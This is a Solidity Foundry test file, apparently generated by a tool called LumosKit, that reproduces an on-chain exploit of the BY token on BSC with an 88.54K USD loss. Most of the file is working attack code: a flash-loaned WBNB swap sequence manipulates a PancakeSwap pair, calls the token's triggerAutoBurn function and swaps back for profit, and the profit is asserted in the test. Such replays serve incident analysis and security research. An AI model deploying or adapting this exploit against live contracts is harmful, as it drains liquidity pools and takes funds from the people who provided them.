// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 88.54K USD
// Attacker : 0x047547a4fa4a67c1032d249b49ec1a79c0460bad
// Attack Contract : 0xc08106a36bfa9cfad264f0d64fc45b93543485ec
// Vulnerable Contract : 0xc08106a36bfa9cfad264f0d64fc45b93543485ec
// Attack Tx : 0xe31c681eee764fb94b1b6bda3bbb0e4f25acb129c19040b9f58ad30541980979
// Block : 102329719
// Chain : BSC
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 84.32K USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 102329718;
    uint256 constant TX_TIMESTAMP = 1780605489;
    uint256 constant TX_BLOCK_NUMBER = 102329719;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
        vm.allowCheatcodes(ATTACK_CONTRACT);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.attack_contract, ATTACKER_EOA, LumosAddresses.ZERO, "BNB", 139602850775618057369);
    }
}

contract OurAttack {
    // - role=attacker_callback selector=0x13a1a562 function_id=0xc08106a36bfa9cfad264f0d64fc45b93543485ec|0x13a1a562|0x13a1a562|len:292|input:00ff61f4cccd6552|ct:CALL|attacker_callback
    // - role=attacker_entry selector=0xea847f11 function_id=0xc08106a36bfa9cfad264f0d64fc45b93543485ec|0xea847f11|0xea847f11|len:196|input:de0e7e3c8e0ba060|ct:CALL|attacker_entry
    // - role=attacker_callback selector=entry function_id=0xc08106a36bfa9cfad264f0d64fc45b93543485ec|entry|entry|len:0|input:a54942c8e365f378|ct:CALL|attacker_callback

    function attack() external payable {
        _attack();
    }

    function flashCallback() internal {
        _markCallback(0);
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsIn(6311064971510890055395186, _addressArray2(LumosAddresses.WBNB, LumosAddresses.BY));
        {
            if (7098440043949538042178 != 0) {
                IERC20Like(LumosAddresses.WBNB).approve(LumosAddresses.PancakeRouter, 7098440043949538042178); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        7098440043949538042178,
                        0,
                        _addressArray2(LumosAddresses.WBNB, LumosAddresses.BY),
                        LumosAddresses.PancakeRouter,
                        1780605489
                    );
            }
        }
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        IERC20Like(LumosAddresses.BY).totalSupply();
        IBY(LumosAddresses.BY).lastBurnTimestamp();
        IERC20Like(LumosAddresses.BY).balanceOf(LumosAddresses.BY);
        {
            LumosHarness.vmExt().startPrank(address(this)); // artifact token-call sender context token_call_16380: preserve observed ERC20 msg.sender/holder exactly; missing balance is a producer-flow gap, not a current-holder fallback
            IERC20Like(LumosAddresses.WBNB).transfer(LumosAddresses.Cake_LP, 32754957105274843900451);

            LumosHarness.vmExt().stopPrank();
        }
        ICake_LP(LumosAddresses.Cake_LP).sync();
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsIn(62867999999999999999995, _addressArray2(LumosAddresses.WBNB, LumosAddresses.BY));
        {
            if (37183223545589637811339 != 0) {
                IERC20Like(LumosAddresses.WBNB).approve(LumosAddresses.PancakeRouter, 37183223545589637811339); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        37183223545589637811339,
                        0,
                        _addressArray2(LumosAddresses.WBNB, LumosAddresses.BY),
                        address(this),
                        1780605489
                    );
            }
        }
        IBY(LumosAddresses.BY).triggerAutoBurn();
        IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, type(uint256).max);
        {
            {
                if (1 != 0) {
                    IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, 1); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                    IPancakeRouter(LumosAddresses.PancakeRouter)
                        .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                            1, 0, _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB), address(this), 1780605489
                        );
                }
            }
            {
                if (1 != 0) {
                    IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, 1); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                    IPancakeRouter(LumosAddresses.PancakeRouter)
                        .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                            1, 0, _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB), address(this), 1780605489
                        );
                }
            }
            {
                if (1 != 0) {
                    IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, 1); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                    IPancakeRouter(LumosAddresses.PancakeRouter)
                        .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                            1, 0, _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB), address(this), 1780605489
                        );
                }
            }
            {
                if (1 != 0) {
                    IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, 1); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                    IPancakeRouter(LumosAddresses.PancakeRouter)
                        .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                            1, 0, _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB), address(this), 1780605489
                        );
                }
            }
            {
                if (1 != 0) {
                    IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, 1); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                    IPancakeRouter(LumosAddresses.PancakeRouter)
                        .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                            1, 0, _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB), address(this), 1780605489
                        );
                }
            }
        }
        uint256 byBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.BY).balanceOf(address(this));
        {
            if (byBalanceOfAttackAttackContract != 0) {
                IERC20Like(LumosAddresses.BY).approve(LumosAddresses.PancakeRouter, byBalanceOfAttackAttackContract); // artifact router swap input: preserve observed amount/source by granting router pull for the current replay frame
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        byBalanceOfAttackAttackContract,
                        0,
                        _addressArray2(LumosAddresses.BY, LumosAddresses.WBNB),
                        address(this),
                        1780605489
                    );
            }
        }
    }

    function _attack() internal {
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(18)),
                bytes32(uint256(635500154125134466396065968997998141789499515594))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(19)),
                bytes32(uint256(178173031801326577992914802080891279334174322777))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(20)),
                bytes32(uint256(635500154125134466396065968997998141789499515594))
            );
        uint256 wbnbBalanceOfA8f73b65d8c = IERC20Like(LumosAddresses.WBNB).balanceOf(LumosAddresses.A_8F73B6_5D8C);
        {
            bytes memory flashLoanProof = abi.encode(
                LumosAddresses.BY,
                LumosAddresses.Cake_LP,
                uint256(422497064287754673928367),
                uint256(1),
                uint256(130668),
                uint256(5)
            );
            IContract_8F73B6_5D8C(LumosAddresses.A_8F73B6_5D8C)
                .flashLoan(LumosAddresses.WBNB, 422497064287754673928367, flashLoanProof);
        }
        uint256 wbnbBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.WBNB).balanceOf(address(this));
        IWBNB(LumosAddresses.WBNB).withdraw(wbnbBalanceOfAttackAttackContract);
        {
            (bool ok,) = payable(LumosAddresses.A_484848_4848).call{value: 7000000000000000000}("");
            if (!ok)
            { /* artifact native transfer used contract receive/fallback context not reproduced by direct empty-call replay */ }
        }
    }

    function _attack2() internal {
        _markCallback(2);
    }

    receive() external payable {}

    function onMoolahFlashLoan(uint256 amount, bytes calldata arg1) external payable {
        amount;
        arg1;
        flashCallback();
        return;
    }

    fallback() external payable {
        if (msg.sig == 0xea847f11) {
            _attack();
            return;
        }
        _entryCb();
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerFlash(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerFlashLoanPreBalances(address[] memory tokens) external {
        _recordBalancerFlash(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

library LumosArrayGuard {
    function capWithReserve(uint256 wanted, address token, address holder, uint256 reserve)
        internal
        view
        returns (uint256)
    {
        uint256 available = IERC20Like(token).balanceOf(holder);
        if (available > reserve) available -= reserve;
        else available = 0;
        return wanted > available ? available : wanted;
    }
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosAttackCall {
    address target;
    bytes data;
}

interface VmExt {
    function store(address target, bytes32 slot, bytes32 value) external;
    function startPrank(address msgSender) external;
    function stopPrank() external;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant attacker_eoa = 0x047547A4fa4a67C1032d249B49EC1a79c0460BAD; // LumosAddresses.attacker_eoa = 0x047547a4fa4a67c1032d249b49ec1a79c0460bad label=attacker_eoa roles=attacker_eoa|contract|attack_address|recipient|sender source=tx_metadata.from confidence=high
    address internal constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E; // LumosAddresses.PancakeRouter = 0x10ed43c718714eb63d5aa57b78b54704e256024e label=PancakeRouter roles=attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant Cake_LP = 0x1F358e18e0DB68FF33C2319C8DaD328eDF9B7059; // LumosAddresses.Cake_LP = 0x1f358e18e0db68ff33c2319c8dad328edf9b7059 label=PancakePair token_symbol=Cake-LP roles=asset|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_484848_4848 = 0x4848489f0b2BEdd788c696e2D79b6b69D7484848; // LumosAddresses.A_484848_4848 = 0x4848489f0b2bedd788c696e2d79b6b69d7484848 label=unresolved roles=code_contract|contract|attack_address|recipient|storage_contract source=unresolved confidence=low
    address internal constant BY = 0x6f50cffEcd4e00EcF7E442774C08c089450B62Ca; // LumosAddresses.BY = 0x6f50cffecd4e00ecf7e442774c08c089450b62ca label=unresolved token_symbol=BY roles=asset|contract|attack_address|recipient|sender|token_related source=unresolved confidence=low
    address internal constant A_8F73B6_5D8C = 0x8F73b65B4caAf64FBA2aF91cC5D4a2A1318E5D8C; // LumosAddresses.A_8F73B6_5D8C = 0x8f73b65b4caaf64fba2af91cc5d4a2a1318e5d8c label=unresolved roles=asset|contract|attack_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c; // LumosAddresses.WBNB = 0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c label=WBNB token_symbol=WBNB roles=asset|contract|attack_address|recipient|sender|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant attack_contract = 0xc08106a36BfA9CFad264F0d64fC45B93543485Ec; // address(this) = 0xc08106a36bfa9cfad264f0d64fc45b93543485ec label=attack_contract roles=asset|attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|economic_holder|localized_contract|attack_address|profit_holder|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
}

interface IBY {
    function lastBurnTimestamp() external view returns (uint256);
    function triggerAutoBurn() external;
}

interface ICake_LP {
    function getReserves() external view;
    function sync() external;
}

interface IContract_8F73B6_5D8C {
    function flashLoan(address, uint256, bytes calldata) external;
}

interface IPancakeRouter {
    function getAmountsIn(uint256, address[] calldata) external view;
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256,
        uint256,
        address[] calldata,
        address,
        uint256
    ) external;
}

interface IWBNB {
    function withdraw(uint256) external;
}

library LumosHarness {
    function vmExt() internal pure returns (VmExt) {
        return VmExt(address(uint160(uint256(keccak256("hevm cheat code")))));
    }

    function safeBalance(address token, address account) internal view returns (uint256) {
        if (token.code.length == 0) return 0;
        (bool ok, bytes memory data) = token.staticcall(abi.encodeWithSignature("balanceOf(address)", account));
        if (!ok || data.length < 32) return 0;
        return abi.decode(data, (uint256));
    }
}
